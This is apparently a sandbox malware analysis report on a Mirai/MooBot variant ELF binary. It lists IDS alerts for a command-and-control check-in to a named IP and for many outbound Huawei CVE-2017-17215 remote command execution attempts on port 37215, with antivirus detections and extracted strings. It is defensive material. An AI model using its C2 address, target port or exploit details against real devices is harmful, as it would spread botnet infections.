                  SID:2829579
                  Source Port:47118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.075999
                  SID:2835222
                  Source Port:41440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.167933
                  SID:2835222
                  Source Port:34354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.117874
                  SID:2829579
                  Source Port:43822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.440849
                  SID:2829579
                  Source Port:55602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.215395
                  SID:2829579
                  Source Port:44420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.553494
                  SID:2835222
                  Source Port:54176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.357682
                  SID:2829579
                  Source Port:54670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.924375
                  SID:2829579
                  Source Port:49000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.825628
                  SID:2829579
                  Source Port:38686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.613814
                  SID:2829579
                  Source Port:38064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.002170
                  SID:2829579
                  Source Port:54228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.827711
                  SID:2829579
                  Source Port:59276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.607971
                  SID:2829579
                  Source Port:48146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.272615
                  SID:2829579
                  Source Port:44912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.463374
                  SID:2829579
                  Source Port:56166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.520093
                  SID:2835222
                  Source Port:59296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.180915
                  SID:2829579
                  Source Port:35736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.848557
                  SID:2835222
                  Source Port:53856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.652225
                  SID:2835222
                  Source Port:53538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.803764
                  SID:2829579
                  Source Port:35928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.962924
                  SID:2829579
                  Source Port:42348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.861312
                  SID:2835222
                  Source Port:34128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.007893
                  SID:2829579
                  Source Port:40452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398015
                  SID:2835222
                  Source Port:52748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.207017
                  SID:2829579
                  Source Port:54912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.823629
                  SID:2829579
                  Source Port:38652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.245550
                  SID:2835222
                  Source Port:46414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2835222
                  Source Port:40794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.662603
                  SID:2829579
                  Source Port:41536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.980775
                  SID:2829579
                  Source Port:41880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.942038
                  SID:2829579
                  Source Port:57610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.169986
                  SID:2829579
                  Source Port:46036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.478130
                  SID:2835222
                  Source Port:40998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.030182
                  SID:2835222
                  Source Port:52126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.418151
                  SID:2829579
                  Source Port:35242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.816887
                  SID:2835222
                  Source Port:45692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.153663
                  SID:2835222
                  Source Port:49604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.326133
                  SID:2835222
                  Source Port:42714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.812623
                  SID:2829579
                  Source Port:55876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.614588
                  SID:2829579
                  Source Port:32954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.083143
                  SID:2829579
                  Source Port:58692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.623898
                  SID:2829579
                  Source Port:44476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629470
                  SID:2829579
                  Source Port:48372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.525645
                  SID:2835222
                  Source Port:60094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.128413
                  SID:2835222
                  Source Port:33394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505039
                  SID:2835222
                  Source Port:48810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483637
                  SID:2829579
                  Source Port:32814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.551648
                  SID:2835222
                  Source Port:45794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.442738
                  SID:2835222
                  Source Port:33196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202638
                  SID:2835222
                  Source Port:45598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.547340
                  SID:2829579
                  Source Port:41836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.773863
                  SID:2835222
                  Source Port:34290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: bolonetwork.x86.elfAvira: detected
                  Source: bolonetwork.x86.elfReversingLabs: Detection: 60%
                  Source: bolonetwork.x86.elfJoe Sandbox ML: detected
                  Source: bolonetwork.x86.elfString: Content-Length: abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinenetstatwgetcurl/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemdshellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/anko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ3f

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:43128 -> 51.79.141.54:5976
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52016 -> 157.8.45.235:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52016 -> 157.8.45.235:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38496 -> 157.5.249.164:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38496 -> 157.5.249.164:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33540 -> 157.19.87.80:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33540 -> 157.19.87.80:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51348 -> 210.21.110.251:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51348 -> 210.21.110.251:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55358 -> 197.160.40.71:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55358 -> 197.160.40.71:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43902 -> 221.191.119.202:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43902 -> 221.191.119.202:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39090 -> 46.225.21.207:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39090 -> 46.225.21.207:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60584 -> 157.243.201.47:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60584 -> 157.243.201.47:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42944 -> 41.71.63.179:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42944 -> 41.71.63.179:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46372 -> 197.140.67.38:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46372 -> 197.140.67.38:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48086 -> 41.117.164.47:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48086 -> 41.117.164.47:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56006 -> 157.233.213.23:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56006 -> 157.233.213.23:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55618 -> 157.52.181.205:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55618 -> 157.52.181.205:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34356 -> 197.178.199.181:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34356 -> 197.178.199.181:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46530 -> 197.48.229.175:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46530 -> 197.48.229.175:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57298 -> 197.29.115.65:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57298 -> 197.29.115.65:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51428 -> 195.37.174.200:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51428 -> 195.37.174.200:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36194 -> 157.118.62.90:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36194 -> 157.118.62.90:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38652 -> 197.134.93.225:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38652 -> 197.134.93.225:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40676 -> 14.126.26.250:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40676 -> 14.126.26.250:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49564 -> 197.174.164.182:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49564 -> 197.174.164.182:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60784 -> 157.241.125.74:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60784 -> 157.241.125.74:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57774 -> 41.174.151.32:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57774 -> 41.174.151.32:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41414 -> 157.26.3.225:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41414 -> 157.26.3.225:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34696 -> 95.51.118.14:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34696 -> 95.51.118.14:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60508 -> 41.70.199.121:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60508 -> 41.70.199.121:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36266 -> 157.10.89.64:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36266 -> 157.10.89.64:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49990 -> 197.242.248.238:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49990 -> 197.242.248.238:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34224 -> 41.254.159.206:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34224 -> 41.254.159.206:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49440 -> 197.45.3.44:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49440 -> 197.45.3.44:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42574 -> 41.204.232.11:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42574 -> 41.204.232.11:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43546 -> 197.174.73.168:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43546 -> 197.174.73.168:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46440 -> 157.158.61.103:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46440 -> 157.158.61.103:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54880 -> 37.145.73.193:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54880 -> 37.145.73.193:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57432 -> 41.189.159.169:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57432 -> 41.189.159.169:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46108 -> 197.2.240.85:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46108 -> 197.2.240.85:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45616 -> 41.197.151.231:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45616 -> 41.197.151.231:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54242 -> 164.106.102.194:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54242 -> 164.106.102.194:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35990 -> 197.215.53.253:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35990 -> 197.215.53.253:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53278 -> 41.195.22.236:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53278 -> 41.195.22.236:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60670 -> 197.190.231.229:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60670 -> 197.190.231.229:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36708 -> 101.129.97.51:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36708 -> 101.129.97.51:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49948 -> 41.235.118.49:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49948 -> 41.235.118.49:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48604 -> 125.39.64.172:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48604 -> 125.39.64.172:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40856 -> 46.221.220.195:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40856 -> 46.221.220.195:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38798 -> 157.212.168.33:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38798 -> 157.212.168.33:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57976 -> 197.29.9.130:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57976 -> 197.29.9.130:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52248 -> 41.80.154.10:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52248 -> 41.80.154.10:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57512 -> 197.5.82.148:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57512 -> 197.5.82.148:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51580 -> 219.72.118.94:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51580 -> 219.72.118.94:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53598 -> 132.170.141.1:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53598 -> 132.170.141.1:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57132 -> 153.104.213.89:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57132 -> 153.104.213.89:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52312 -> 41.36.102.72:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52312 -> 41.36.102.72:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37300 -> 41.216.51.31:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37300 -> 41.216.51.31:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37272 -> 197.238.249.245:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37272 -> 197.238.249.245:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45360 -> 197.225.238.55:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45360 -> 197.225.238.55:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36172 -> 157.23.38.169:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36172 -> 157.23.38.169:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45078 -> 131.142.45.223:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45078 -> 131.142.45.223:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42490 -> 157.203.62.242:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42490 -> 157.203.62.242:37215
